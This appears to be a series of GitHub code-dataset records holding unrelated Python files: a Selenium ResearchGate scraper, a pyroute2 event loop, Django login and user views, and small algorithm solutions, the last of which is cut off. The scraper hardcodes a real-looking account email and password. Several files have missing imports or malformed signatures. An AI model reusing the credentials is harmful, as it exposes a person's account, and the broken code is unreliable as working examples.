Keys\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium import webdriver\nfrom selenium.webdriver.edge.service import Service\nfrom webdriver_manager.microsoft import EdgeChromiumDriverManager\nfrom uuid import uuid4\nimport os\nimport argparse\nos.environ['WDM_LOG'] = '0'\nparser = argparse.ArgumentParser()\nparser.add_argument('h', nargs='?', const=0, type=int)\nargs = parser.parse_args()\n\n\noptions = webdriver.EdgeOptions()\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\n# disable\n# options.add_experimental_option(\n# \"excludeSwitches\", [\"enable-automation\"])\n# options.add_experimental_option('useAutomationExtension', False)\noptions.add_argument('--disable-logging')\nif args.h:\n options.add_argument('--headless')\n\n\nprefs = {\"download.default_directory\": \"C:\\Tutorial\"}\noptions.add_experimental_option(\"prefs\", prefs)\noptions.add_argument(\"start-maximized\")\noptions.add_argument(\"--window-size=1920,1080\")\noptions.add_argument(\"--disable-extensions\")\noptions.add_argument(\"--proxy-server='direct://'\")\noptions.add_argument(\"--proxy-bypass-list=*\")\noptions.add_argument(\"--start-maximized\")\noptions.add_argument('--disable-gpu')\noptions.add_argument('--disable-dev-shm-usage')\noptions.add_argument('--no-sandbox')\noptions.add_argument('--ignore-certificate-errors')\n\n\nPAPER1 = \"A Comprehensive Survey of Image-Based Food Recognition and Volume Estimation Methods for Dietary Assessment\"\nPAPER2 = \"Recommending Research Articles: A Multi-Level Chronological Learning-Based Approach Using Unsupervised Keyphrase Extraction and Lexical Similarity Calculation\"\nPAPER3 = \"PositionRank: An Unsupervised Approach to Keyphrase Extraction from Scholarly Documents\"\npaper = {\n\n \"name\": PAPER1,\n \"id\": uuid4()\n}\n\ndriver = webdriver.Edge(service=Service(\n EdgeChromiumDriverManager().install()), options=options)\n\ndriver.get('https://www.researchgate.net/')\n\n\ndriver.find_element(by=By.CSS_SELECTOR, value=\".index-header__log-in\").click()\ndriver.find_element(by=By.CSS_SELECTOR,\n value=\"#input-login\").send_keys(\"ema.191902035@green.ac.bd\")\ndriver.find_element(by=By.CSS_SELECTOR,\n value=\"#input-password\").send_keys(\"researchgate\")\ndriver.find_element(by=By.CSS_SELECTOR,\n value=\"button[type='submit']\").click()\ndriver.find_element(by=By.CSS_SELECTOR,\n value=\"#header-search-action\").send_keys(paper['name'])\ndriver.find_element(by=By.CSS_SELECTOR,\n value=\"#header-search-action\").send_keys(Keys.ENTER)\nfirst_paper = None\n\ntry:\n first_paper = driver.find_element(by=By.XPATH,\n value=\"(//div[@class='search-box__result-item'])[1]\")\nexcept:\n print(\"Page not found\")\nif first_paper:\n first_paper.find_element(by=By.TAG_NAME, value=\"a\").click()\n\n paper_info_el = driver.find_element(by=By.XPATH,\n value=\"(//div[@class='content-grid__columns--narrow'])[1]\")\n\n paper_infos = paper_info_el.find_elements(\n by=By.CLASS_NAME, value=\"nova-legacy-o-stack__item\")\n\n try:\n ref_button = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH,\n \"(//button[@role='tab'])[5]\")))\n\n ref_button.click()\n\n print(ref_button.text)\n except:\n pass\n\n # Wait to load page\n sleep(5)\n # # Get scroll height\n last_height = driver.execute_script(\"return document.body.scrollHeight\")\n while True:\n # Scroll down to bottom\n driver.execute_script(\n \"window.scrollTo(0, document.body.scrollHeight);\")\n\n # Wait to load page\n sleep(3)\n\n # Calculate new scroll height and compare with last scroll height\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n break\n last_height = new_height\n\n showMoreFound = True\n while showMoreFound:\n try:\n showMore = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR,\n \"button[class='nova-legacy-c-button nova-legacy-c-button--align-center nova-legacy-c-button--radius-m nova-legacy-c-button--size-m nova-legacy-c-button--color-blue nova-legacy-c-button--theme-bare nova-legacy-c-button--width-full']\")))\n # print(showMore)\n if showMore:\n showMore.click()\n driver.implicitly_wait(3)\n else:\n showMoreFound = False\n except:\n showMoreFound = False\n\n sleep(1)\n # sections = driver.find_element(\n # by=By.CSS_SELECTOR, value=\"div[class='nova-legacy-o-stack nova-legacy-o-stack--gutter-xxxl nova-legacy-o-stack--spacing-xl nova-legacy-o-stack--show-divider']\")\n\n allRefs = driver.find_elements(\n By.XPATH, \"//div[@class='nova-legacy-o-stack__item']//div[@class='nova-legacy-o-stack nova-legacy-o-stack--gutter-s nova-legacy-o-stack--spacing-none nova-legacy-o-stack--no-gutter-outside']\")\n print(len(allRefs))\n items = []\n\n for ref in allRefs:\n i = ref.find_element(\n by=By.CLASS_NAME, value=\"nova-legacy-v-publication-item__body\")\n items.append(i)\n print()\n\n # missingBody = sections.find_elements(\n # by=By.XPATH, value='//div[@class=\"nova-legacy-e-text nova-legacy-e-text--size-m nova-legacy-e-text--family-sans-serif nova-legacy-e-text--spacing-none nova-legacy-e-text--color-inherit\"]/ancestor::div[@class=\"nova-legacy-o-stack__item\"]')\n # downBtn = sections.find_elements(\n # by=By.XPATH, value=\"//a[.//span[text()='Download']]\")\n # print(len(downBtn))\n\n\n# # //a[@class=\"nova-legacy-e-link nova-legacy-e-link--color-inherit nova-legacy-e-link--theme-bare\"]\n\n allRefData = []\n ss = set()\n\n types = ['Literature Review', 'Conference Paper', 'Article', 'Chapter']\n avoid = types + ['Full-text available', 'File available']\n for s in items:\n links = s.find_elements(by=By.TAG_NAME, value=\"a\")\n # print(link.text)\n paper_info = {\n # \"name\": \"\",\n # \"type\": \"\",\n \"published_date\": \"\",\n # \"publisher\": \"\",\n # \"id\": uuid4(),\n # \"paper_link\": \"\",\n # \"download_link\": \"\",\n\n }\n\n # for link in links:\n # if 'https://www.researchgate.net/publication/' in link.get_attribute('href'):\n # if link.text not in avoid:\n # paper_info['name'] = link.text\n # paper_info['type'] = link.text\n # paper_info['paper_link'] = link.get_attribute('href')\n # elif link.text in types:\n # paper_info['type'] = link.text\n\n time = s.find_element(By.XPATH, '//time')\n paper_info['date'] = time.get_attribute('datetime')\n # print(time.text)\n # print(time.get_attribute('datetime'))\n\n allRefData.append(paper_info)\n\n # for i, d in enumerate(allRefs):\n # try:\n # a = d.find_element(\n # By.XPATH, \".//a[.//span[text()='Download']]\")\n # if a:\n # allRefData[i]['download_link'] = a.get_attribute('href')\n # print(i)\n # # print(len(a))\n # print()\n # except:\n # print(f\"not found {i}\")\n\n with open('write.txt', 'w') as f:\n for p in allRefData:\n # f.write(str(p['name']) + '\\n')\n # f.write(str(p['type']) + '\\n')\n # f.write(str(p['paper_link']) + '\\n')\n # f.write(str(p['download_link']) + '\\n')\n f.write(str(p['published_date']) + '\\n')\n # f.write(str(p['publisher']) + '\\n')\n f.write('\\n')\n# print(ss)\n# print(len(ss))\n\n# print(\"Done\")\n# if not args.h:\n# sleep(50)\n\n\"\"\"\nhttps://stackoverflow.com/questions/8577636/select-parent-element-of-known-element-in-selenium\n\n\n\n\n\nNow that you need to select parent tag 'a' based on text, then use\n\ndriver.find_element(By.XPATH, \"//button[.//span[text()='Close']]\")\n\nhttps://spltech.co.uk/how-to-find-the-parent-element-in-a-page-using-python-selenium-webdriver/\n\n\n
\n
\n
\n
\n Hello World\n
\n
\n
\n
\n
\n
\n Hello World\n
\n
\n
\n
\n Hello World\n
\n
\n\n \"\"\"\n","repo_name":"dev-SR/RefScrapper","sub_path":"raw.py","file_name":"raw.py","file_ext":"py","file_size_in_byte":9273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9415294736","text":"import inspect\nimport logging\nimport queue\nimport threading\nimport time\nimport traceback\nfrom functools import partial\n\nfrom pyroute2 import config\n\nfrom . import schema\nfrom .events import (\n DBMExitException,\n InvalidateHandlerException,\n RescheduleException,\n ShutdownException,\n)\nfrom .messages import cmsg, cmsg_event, cmsg_failed, cmsg_sstart\n\nlog = logging.getLogger(__name__)\n\n\ndef Events(*argv):\n for sequence in argv:\n if sequence is not None:\n for item in sequence:\n yield item\n\n\nclass NDBConfig(dict):\n def __init__(self, task_manager):\n self.task_manager = task_manager\n\n def __getitem__(self, key):\n return self.task_manager.config_get(key)\n\n def __setitem__(self, key, value):\n return self.task_manager.config_set(key, value)\n\n def __delitem__(self, key):\n return self.task_manager.config_del(key)\n\n def keys(self):\n return self.task_manager.config_keys()\n\n def items(self):\n return self.task_manager.config_items()\n\n def values(self):\n return self.task_manager.config_values()\n\n\nclass TaskManager:\n def __init__(self, ndb):\n self.ndb = ndb\n self.log = ndb.log\n self.event_map = {}\n self.event_queue = ndb._event_queue\n self.thread = None\n self.ctime = self.gctime = time.time()\n\n def register_handler(self, event, handler):\n if event not in self.event_map:\n self.event_map[event] = []\n self.event_map[event].append(handler)\n\n def unregister_handler(self, event, handler):\n self.event_map[event].remove(handler)\n\n def default_handler(self, target, event):\n if isinstance(getattr(event, 'payload', None), Exception):\n raise event.payload\n log.debug('unsupported event ignored: %s' % type(event))\n\n def check_sources_started(self, _locals, target, event):\n _locals['countdown'] -= 1\n if _locals['countdown'] == 0:\n self.ndb._dbm_ready.set()\n\n def wrap_method(self, method):\n #\n # this wrapper will be published in the DBM thread\n #\n def _do_local_generator(target, request):\n try:\n for item in method(*request.argv, **request.kwarg):\n request.response.put(item)\n request.response.put(StopIteration())\n except Exception as e:\n request.response.put(e)\n\n def _do_local_single(target, request):\n try:\n (request.response.put(method(*request.argv, **request.kwarg)))\n except Exception as e:\n (request.response.put(e))\n\n #\n # this class will be used to map the requests\n #\n class cmsg_req(cmsg):\n def __init__(self, response, *argv, **kwarg):\n self['header'] = {'target': None}\n self.response = response\n self.argv = argv\n self.kwarg = kwarg\n\n #\n # this method will proxy the original one\n #\n def _do_dispatch_generator(self, *argv, **kwarg):\n if self.thread == id(threading.current_thread()):\n # same thread, run method locally\n for item in method(*argv, **kwarg):\n yield item\n else:\n # another thread, run via message bus\n response = queue.Queue()\n request = cmsg_req(response, *argv, **kwarg)\n self.event_queue.put((request,))\n while True:\n item = response.get()\n if isinstance(item, StopIteration):\n return\n elif isinstance(item, Exception):\n raise item\n else:\n yield item\n\n def _do_dispatch_single(self, *argv, **kwarg):\n if self.thread == id(threading.current_thread()):\n # same thread, run method locally\n return method(*argv, **kwarg)\n else:\n # another thread, run via message bus\n response = queue.Queue(maxsize=1)\n request = cmsg_req(response, *argv, **kwarg)\n self.event_queue.put((request,))\n ret = response.get()\n if isinstance(ret, Exception):\n raise ret\n else:\n return ret\n\n #\n # return the method spec to be announced\n #\n handler = _do_local_single\n proxy = _do_dispatch_single\n if inspect.isgeneratorfunction(method):\n handler = _do_local_generator\n proxy = _do_dispatch_generator\n return (cmsg_req, handler, proxy)\n\n def register_api(self, api_obj, prefix=''):\n for name in dir(api_obj):\n method = getattr(api_obj, name, None)\n if hasattr(method, 'publish'):\n if isinstance(method.publish, str):\n name = method.publish\n name = f'{prefix}{name}'\n event, handler, proxy = self.wrap_method(method)\n setattr(self, name, partial(proxy, self))\n self.event_map[event] = [handler]\n\n def run(self):\n _locals = {'countdown': len(self.ndb._nl)}\n self.thread = id(threading.current_thread())\n\n # init the events map\n event_map = {\n cmsg_event: [lambda t, x: x.payload.set()],\n cmsg_failed: [lambda t, x: (self.ndb.schema.mark(t, 1))],\n cmsg_sstart: [partial(self.check_sources_started, _locals)],\n }\n self.event_map = event_map\n\n try:\n self.ndb.schema = schema.DBSchema(\n self.ndb.config,\n self.ndb.sources,\n self.event_map,\n self.log.channel('schema'),\n )\n self.register_api(self.ndb.schema, 'db_')\n self.register_api(self.ndb.schema.config, 'config_')\n self.ndb.bonfig = NDBConfig(self)\n\n except Exception as e:\n self.ndb._dbm_error = e\n self.ndb._dbm_ready.set()\n return\n\n for spec in self.ndb._nl:\n spec['event'] = None\n self.ndb.sources.add(**spec)\n\n for event, handlers in self.ndb.schema.event_map.items():\n for handler in handlers:\n self.register_handler(event, handler)\n\n stop = False\n source = None\n reschedule = []\n while not stop:\n source, events = self.event_queue.get()\n events = Events(events, reschedule)\n reschedule = []\n try:\n for event in events:\n handlers = event_map.get(\n event.__class__, [self.default_handler]\n )\n\n for handler in tuple(handlers):\n try:\n target = event['header']['target']\n handler(target, event)\n except RescheduleException:\n if 'rcounter' not in event['header']:\n event['header']['rcounter'] = 0\n if event['header']['rcounter'] < 3:\n event['header']['rcounter'] += 1\n self.log.debug('reschedule %s' % (event,))\n reschedule.append(event)\n else:\n self.log.error('drop %s' % (event,))\n except InvalidateHandlerException:\n try:\n handlers.remove(handler)\n except Exception:\n self.log.error(\n 'could not invalidate '\n 'event handler:\\n%s'\n % traceback.format_exc()\n )\n except ShutdownException:\n stop = True\n break\n except DBMExitException:\n return\n except Exception:\n self.log.error(\n 'could not load event:\\n%s\\n%s'\n % (event, traceback.format_exc())\n )\n if time.time() - self.gctime > config.gc_timeout:\n self.gctime = time.time()\n except Exception as e:\n self.log.error(f'exception <{e}> in source {source}')\n # restart the target\n try:\n self.log.debug(f'requesting source {source} restart')\n self.ndb.sources[source].state.set('restart')\n except KeyError:\n self.log.debug(f'key error for {source}')\n pass\n\n # release all the sources\n for target in tuple(self.ndb.sources.cache):\n source = self.ndb.sources.remove(target, sync=False)\n if source is not None and source.th is not None:\n self.log.debug(f'closing source {source}')\n source.close()\n if self.ndb.schema.config['db_cleanup']:\n self.log.debug('flush DB for the target %s' % target)\n self.ndb.schema.flush(target)\n else:\n self.log.debug('leave DB for debug')\n\n # close the database\n self.ndb.schema.commit()\n self.ndb.schema.close()\n\n # close the logging\n for handler in self.log.logger.handlers:\n handler.close()\n","repo_name":"svinota/pyroute2","sub_path":"pyroute2/ndb/task_manager.py","file_name":"task_manager.py","file_ext":"py","file_size_in_byte":9808,"program_lang":"python","lang":"en","doc_type":"code","stars":888,"dataset":"github-code","pt":"61"} +{"seq_id":"26428189037","text":"import sqlite3\nimport datetime\nvisits_db = '__HOME__/dat/time_example2.db'\n \ndef request_handler(request):\n conn = sqlite3.connect(visits_db) # connect to that database (will create if it doesn't already exist)\n c = conn.cursor() # make cursor into database (allows us to execute commands)\n outs = \"\"\n c.execute('''CREATE TABLE IF NOT EXISTS dated_table (user text,favorite_number int, timing timestamp);''') # run a CREATE TABLE command\n fifteen_minutes_ago = datetime.datetime.now()- datetime.timedelta(minutes = 15) # create time for fifteen minutes ago!\n c.execute('''INSERT into dated_table VALUES (?,?,?);''', ('joe','5',datetime.datetime.now()))\n things = c.execute('''SELECT * FROM dated_table WHERE timing > ? ORDER BY timing ASC;''',(fifteen_minutes_ago,)).fetchall()\n outs = \"Things:\\n\"\n for x in things:\n outs+=str(x)+\"\\n\"\n conn.commit() # commit commands\n conn.close() # close connection to database\n return outs","repo_name":"mtrejo0/SchoolWork","sub_path":"6.08/labs/lab4a/serverDat.py","file_name":"serverDat.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27499427738","text":"import sys\n\nsys.stdin = open('input.txt')\n\ninput = sys.stdin.readline\nN = int(input())\narr = []\n\nfor _ in range(N):\n arr.append(int(input()))\n\nminV = sys.maxsize\nmm = min(arr)\nfor i in arr:\n if i == mm:\n continue\n else:\n minV = min(i, minV)\nans = []\nfor i in range(2, minV):\n r = arr[0] % i\n for j in range(1, N):\n if r != (arr[j] % i):\n break\n else:\n ans.append(i)\nprint(*ans)\n \n\n ","repo_name":"khjeon5328/today_algorithm","sub_path":"2021/2021.04월/29일/2981.py","file_name":"2981.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21958592708","text":"N = int(input())\nM = int(input())\n\na = [True] * (M+1)\na[1] = False\nm = int( (M+1) ** 0.5)\nsum = 0\nmin = 0\n\nfor i in range(2, m+1):\n if a[i] == True:\n for j in range(i+i, M+1, i):\n a[j] = False\n\nfor i in range(N,M+1):\n if a[i] == True:\n sum += i\n\n if a[i] == True and min == 0:\n min = i\n\nif min == 0:\n print(-1)\n\nelse :\n print(sum)\n print(min)","repo_name":"dujong/Backjoon","sub_path":"기본수학2/소수.py","file_name":"소수.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13405299238","text":"\nimport os\nimport logging\nimport tempfile\nimport traceback\nfrom functools import partial\n\nimport sublime\nimport sublime_plugin\n\nfrom anaconda_rust.anaconda_lib.anaconda_plugin import is_code\nfrom anaconda_rust.anaconda_lib.anaconda_plugin import ProgressBar\nfrom anaconda_rust.anaconda_lib.anaconda_plugin import Worker, Callback\nfrom anaconda_rust.anaconda_lib.helpers import get_settings, get_window_view\nfrom anaconda_rust.anaconda_lib.helpers import file_directory\n\n\nclass AnacondaRustFmt(sublime_plugin.TextCommand):\n \"\"\"Execute rustfmt command in a file\n \"\"\"\n\n data = None\n\n def run(self, edit):\n\n if self.data is not None:\n self.update_buffer(edit)\n return\n\n try:\n messages = {\n 'start': 'Auto formatting file...',\n 'end': 'done!',\n 'fail': 'The auto formatting failed!',\n 'timeout': 'The auto formatiing timed out!'\n }\n self.pbar = ProgressBar(messages)\n self.pbar.start()\n self.view.set_read_only(True)\n\n rustfmt = get_settings(\n self.view, 'rustfmt_binary_path', 'rustfmt'\n )\n if rustfmt == '':\n rustfmt = 'rustfmt'\n\n self.code = self.view.substr(\n sublime.Region(0, self.view.size())\n )\n\n # the JonServer deletes the temp file so we don't worry\n fd, path = tempfile.mkstemp(suffix=\".rs\", dir=file_directory())\n with os.fdopen(fd, \"w\", encoding=\"utf-8\") as tmp:\n tmp.write(self.code)\n\n config_path = get_settings(self.view, 'rust_rustfmt_config_path', '')\n\n data = {\n 'vid': self.view.id(),\n 'filename': path,\n 'settings': {\n 'rustfmt_binary_path': rustfmt,\n 'config_path': config_path\n },\n 'method': 'format',\n 'handler': 'rustfmt'\n }\n timeout = get_settings(self.view, 'rust_rustfmt_timeout', 1)\n\n callback = Callback(timeout=timeout)\n callback.on(success=self.prepare_data)\n callback.on(error=self.on_failure)\n callback.on(timeout=partial(self.clean_tmp_file, path))\n\n Worker().execute(callback, **data)\n except:\n logging.error(traceback.format_exc())\n\n def is_enabled(self):\n \"\"\"Determine if this command is enabled or not\n \"\"\"\n\n return is_code(self.view, lang='rust', ignore_comments=True)\n\n def on_failure(self, *args, **kwargs):\n \"\"\"Called when callback return a failure or times out\n \"\"\"\n\n self.pbar.terminate(status=self.pbar.Status.FAILURE)\n self.view.set_read_only(False)\n print(args[0]['error'])\n\n def prepare_data(self, data):\n \"\"\"Prepare the returned data to overwrite our buffer\n \"\"\"\n\n self.data = data\n self.pbar.terminate()\n self.view.set_read_only(False)\n self.view.run_command('anaconda_rust_fmt')\n\n def update_buffer(self, edit):\n \"\"\"Update and reload the buffer\n \"\"\"\n\n view = get_window_view(self.data['vid'])\n output = self.sanitize(self.data.get('output'))\n if output and self.sanitize(self.code) != output:\n region = sublime.Region(0, view.size())\n view.replace(edit, region, self.data.get('output'))\n if get_settings(view, 'rust_format_on_save'):\n sublime.set_timeout(lambda: view.run_command('save'), 0)\n\n self.data = None\n self.code = None\n\n def sanitize(self, text):\n \"\"\"Remove blank lines from text and trim it\n \"\"\"\n\n return os.linesep.join([s for s in text.splitlines() if s]).strip()\n\n def clean_tmp_file(self, path):\n \"\"\"Clean the tmp file at timeout\n \"\"\"\n\n try:\n os.remove(path)\n except:\n pass\n\n def _get_working_directory(self):\n \"\"\"Return back the project file directory if any or current file one\n \"\"\"\n\n pfilename = sublime.active_window().project_file_name()\n if pfilename is not None:\n return os.path.dirname(pfilename)\n\n return os.path.dirname(self.view.file_name())\n","repo_name":"DamnWidget/anaconda_rust","sub_path":"commands/rustfmt.py","file_name":"rustfmt.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"61"} +{"seq_id":"36064928366","text":"l = [10,15,3,7]\nk = 17\n\nfor i in l:\n for j in l:\n if (i + j) == k:\n break\nprint(i,j)\n\n# See if there are any other solutions\n\n","repo_name":"chethanbr86/Python_programs","sub_path":"daily_coding/dc1_sumofdigits.py","file_name":"dc1_sumofdigits.py","file_ext":"py","file_size_in_byte":147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32463537596","text":"# This will be the class containing the rounds of each game\nfrom game_files.roster_files.random_player_generator import *\n\nNum_of_players = 538\n\n\nclass Round:\n \"\"\"\n Each round of a game, where there is a correct NBA player and the player has\n 5 tries to get each player. With each guess, the player will be given\n information based on their last guess. If the guessed NBA player plays in\n the same team, has the same height, or has the same weight, the player will\n be told that the correct component is green. if the guessed NBA player plays\n in the same division, is within 2 inches of the correct player, or is within\n 15 pounds, then they will be told that they are close to the answer with\n the close component being yellow\n\n === Attributes ===\n correct_player: The correct NBA player that the player tries to guess\n \"\"\"\n correct_player: list\n\n def __init__(self):\n self.correct_player = PlayerGenerator()\n\n def name_correctness(self, guess: str) -> bool:\n \"\"\"\n Returns whether or not the guess is correct\n :param guess: The guess that the player provides\n :return: Whether or not the guess is correct or not\n \"\"\"\n if guess == self.correct_player:\n return True\n return False\n\n def height_guess(self, guess: str) -> str:\n \"\"\"\n Returns \"correct\" if the height of the guessed player is the same as the\n correct_player. Returns \"close\" if the height of the guessed player is\n 2 inches off of the correct_player. Returns \"incorrect\" if the height of\n the guessed player is off by more than 2 inches.\n :param guess: The guess that the player provides\n \"\"\"\n guess_player = PlayerFinder(guess)\n if guess_player[2] == self.correct_player[2]:\n return \"correct\"\n elif abs(int(guess_player[2][2]) - int(self.correct_player[2][2])) < 3:\n return \"close\"\n else:\n return \"incorrect\"\n\n def position_guess(self, guess: str) -> str:\n \"\"\"\n Return \"correct\" if the position of the guessed player is the same as\n the correct_player. Returns \"close\" if either the guessed player or the\n correct player or both have two positions and they both have one\n position in common. Returns \"incorrect\" if the position of\n the guessed player is wrong.\n :param guess: The name of the player\n \"\"\"\n guess_player = PlayerFinder(guess)\n if guess_player[1] == self.correct_player[1]:\n return \"correct\"\n elif len(guess_player[1]) > 1 and len(self.correct_player[1]) == 1:\n if self.correct_player[1] == guess_player[1][0]:\n return \"close\"\n return \"incorrect\"\n elif len(self.correct_player[1]) > 1 and len(guess_player[1]) == 1:\n if self.correct_player[1][0] == guess_player[1]:\n return \"close\"\n elif self.correct_player[1][2] == guess_player[1]:\n return \"close\"\n return \"incorrect\"\n elif len(guess_player[1]) > 1 and len(self.correct_player[1]) > 1:\n if self.correct_player[1][0] == guess_player[1][0] or \\\n self.correct_player[1][2] == guess_player[1][0] or \\\n self.correct_player[1][0] == guess_player[1][2] or \\\n self.correct_player[1][2] == guess_player[1][2]:\n return \"close\"\n return \"incorrect\"\n\n def weight_guess(self, guess: str) -> str:\n \"\"\"\n Returns \"correct\" if the weight of the guessed player is the same as the\n correct_player. Returns \"close\" if the weight of the guessed player is\n plus or minus 10 pounds of the correct_player. Returns \"incorrect\" if\n the weight is off by more than 10 pounds.\n :param guess: the name of the player\n \"\"\"\n guess_player = PlayerFinder(guess)\n guess_weight = int(guess_player[3])\n correct_weight = int(self.correct_player[3])\n if guess_weight == correct_weight:\n return \"correct\"\n elif abs(guess_weight - correct_weight) <= 10:\n return \"close\"\n return \"incorrect\"\n\n\nif __name__ == '__main__':\n player = Round()\n","repo_name":"JMH-0402/Poeltl_Duplicate","sub_path":"game_files/round.py","file_name":"round.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6285982832","text":"from rest_framework.viewsets import ModelViewSet\nfrom django.contrib.auth import authenticate, login, logout, get_user_model\nfrom django.contrib.auth.models import Group, Permission\nfrom .models import User\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .schemas import LoginSchema\nfrom rest_framework.permissions import AllowAny\nfrom .serializers import AdminSerializer,CashierSerializer, GroupSerializer, LoginSerializer\nfrom rest_framework_simplejwt.tokens import RefreshToken\n\nclass GroupViewSet(ModelViewSet):\n\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n def create(self, request, args, *kwargs):\n serializer = self.get_serializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response({\n 'status': 'Successful'\n }, status=status.HTTP_201_CREATED)\n else:\n default_errors = serializer.errors\n new_error = {}\n for field_name, field_errors in default_errors.items():\n new_error[field_name] = field_errors[0]\n return Response(new_error, status=status.HTTP_400_BAD_REQUEST)\n\nclass AdminViewSet(ModelViewSet):\n \n def get_queryset(self):\n return get_user_model().objects.filter(groups__name='adm')\n serializer_class = AdminSerializer \n\n def create(self, request, args, *kwargs):\n serializer = self.get_serializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response({\n 'status': 'Successful'\n }, status=status.HTTP_201_CREATED)\n else:\n default_errors = serializer.errors\n new_error = {}\n for field_name, field_errors in default_errors.items():\n new_error[field_name] = field_errors[0]\n return Response(new_error, status=status.HTTP_400_BAD_REQUEST)\n\nclass CashierViewSet(ModelViewSet):\n permission_classes = (AllowAny,)\n\n def get_queryset(self):\n return get_user_model().objects.filter(groups__name='csh')\n serializer_class = CashierSerializer\n\n def create(self, request, *kwargs):\n serializer = self.get_serializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response({\n 'status': 'Successful'\n }, status=status.HTTP_201_CREATED)\n else:\n default_errors = serializer.errors\n new_error = {}\n for field_name, field_errors in default_errors.items():\n new_error[field_name] = field_errors[0]\n return Response(new_error, status=status.HTTP_400_BAD_REQUEST)\n\nclass LoginView(APIView):\n schema = LoginSchema\n permission_classes = (AllowAny,)\n\n def post(self, request): \n serializer = LoginSerializer(data=request.data)\n if serializer.is_valid():\n email = serializer.validated_data[\"email\"]\n password = serializer.validated_data['password']\n try:\n user = User.objects.get(email=email)\n if user.check_password(password):\n if user.is_active:\n login(request, user)\n\n # return Response(LoginSerializer(user).data, status=status.HTTP_200_OK)\n return Response({\"email\":email,\n \"username\":user.username,\n \"access_token\": str(RefreshToken.for_user(user).access_token)\n # \"refresh_token\":str(RefreshToken.for_user(user))\n }\n , status=status.HTTP_200_OK)\n\n else:\n return Response({\n \"code\": 110,\n \"message\": \"unverified account\",\n \"resolve\": \"please verify your account\"\n }, status=status.HTTP_401_UNAUTHORIZED)\n else:\n return Response({\n \"code\": 120,\n \"message\": \"incorect password\",\n \"resolve\": \"The password does not match with the email\"\n }, status=status.HTTP_401_UNAUTHORIZED)\n except User.DoesNotExist:\n return Response({\n \"code\": 120,\n \"message\": \"user does not exist\",\n \"resolve\": \"There's no account matching this email\"\n }, status=status.HTTP_401_UNAUTHORIZED)\n else:\n default_errors = serializer.errors\n new_error = {}\n for field_name, field_errors in default_errors.items():\n new_error[field_name] = field_errors[0]\n return Response(new_error, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"suavelad/receipt_api_app","sub_path":"auth_api/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22605900727","text":"from newsrc import dataloader\nfrom newsrc import glm\n\n\nif __name__ == '__main__':\n train_path = './src/train.conll'\n dev_path = './src/dev.conll'\n\n train_dataset = dataloader.DataLoader(train_path, batch_size=10)\n print(train_dataset)\n dev_dataset = dataloader.DataLoader(dev_path, batch_size=10)\n print(dev_dataset)\n print(train_dataset.tag_dict)\n # print(train_dataset.sent_word_list[0])\n # print(train_dataset.sent_tag_list[0])\n\n\n myglm = glm.GlobalLinearModel(train_dataset, dev_dataset)\n # print(myglm.epsilon)\n # print(myglm.tag_dict)\n myglm.online_training(1)","repo_name":"guangyuli-uoe/sulzh","sub_path":"global_linear/t4.py","file_name":"t4.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23573345901","text":"#!/usr/bin/env python3\nimport heapq\n\nclass ConsecStalls:\n StallCounter = 0\n def __init__(self, length, num):\n self.length = length\n self.num = num\n self.unique = ConsecStalls.StallCounter\n ConsecStalls.StallCounter += 1\n\n def create_heap_element(self):\n return (-1 * self.length, self.unique, self)\n\nclass Instance:\n def __init__(self, name, N, K):\n self.name = name\n initial_stalls = ConsecStalls(N, 1)\n self.heap = [initial_stalls.create_heap_element()]\n heapq.heapify(self.heap)\n self.remaining = K\n self.maxLs = None\n self.minLs = None\n self.final_broken_block = None\n\n def solve(self):\n enough_breaking_up = False\n while not enough_breaking_up:\n enough_breaking_up = self.work_through_heap()\n self.last_placement_found()\n\n def work_through_heap(self):\n #print('\\nREMAINING:', self.remaining)\n #self.dump_heap()\n maximum = self.get_largest_element()\n\n enough_breaking_up = True\n if not self.all_get_assigned(maximum):\n self.remaining -= maximum.num\n if self.remaining < 0:\n raise ValueError('Too many assigned')\n elif self.remaining > 0:\n new_elements = self.split_maximum(maximum)\n self.push_stalls_to_heap(new_elements)\n enough_breaking_up = False\n if enough_breaking_up:\n self.final_broken_block = maximum\n return enough_breaking_up\n\n def dump_heap(self):\n print('DUMPING HEAP / LENGTH: ', len(self.heap))\n for idx, uniq, val in self.heap:\n print((val.length, val.num))\n\n def get_largest_element(self):\n if not self.heap:\n raise ValueError('Expected K < N')\n maximum = self.aggregate_maximal_values()\n return maximum\n\n def aggregate_maximal_values(self):\n maximum = self.pop_from_heap()\n while self.heap:\n candidate_maximum = self.pop_from_heap()\n if maximum.length == candidate_maximum.length:\n maximum.num += candidate_maximum.num\n else:\n self.single_safe_push(candidate_maximum)\n break\n return maximum\n\n def pop_from_heap(self):\n return 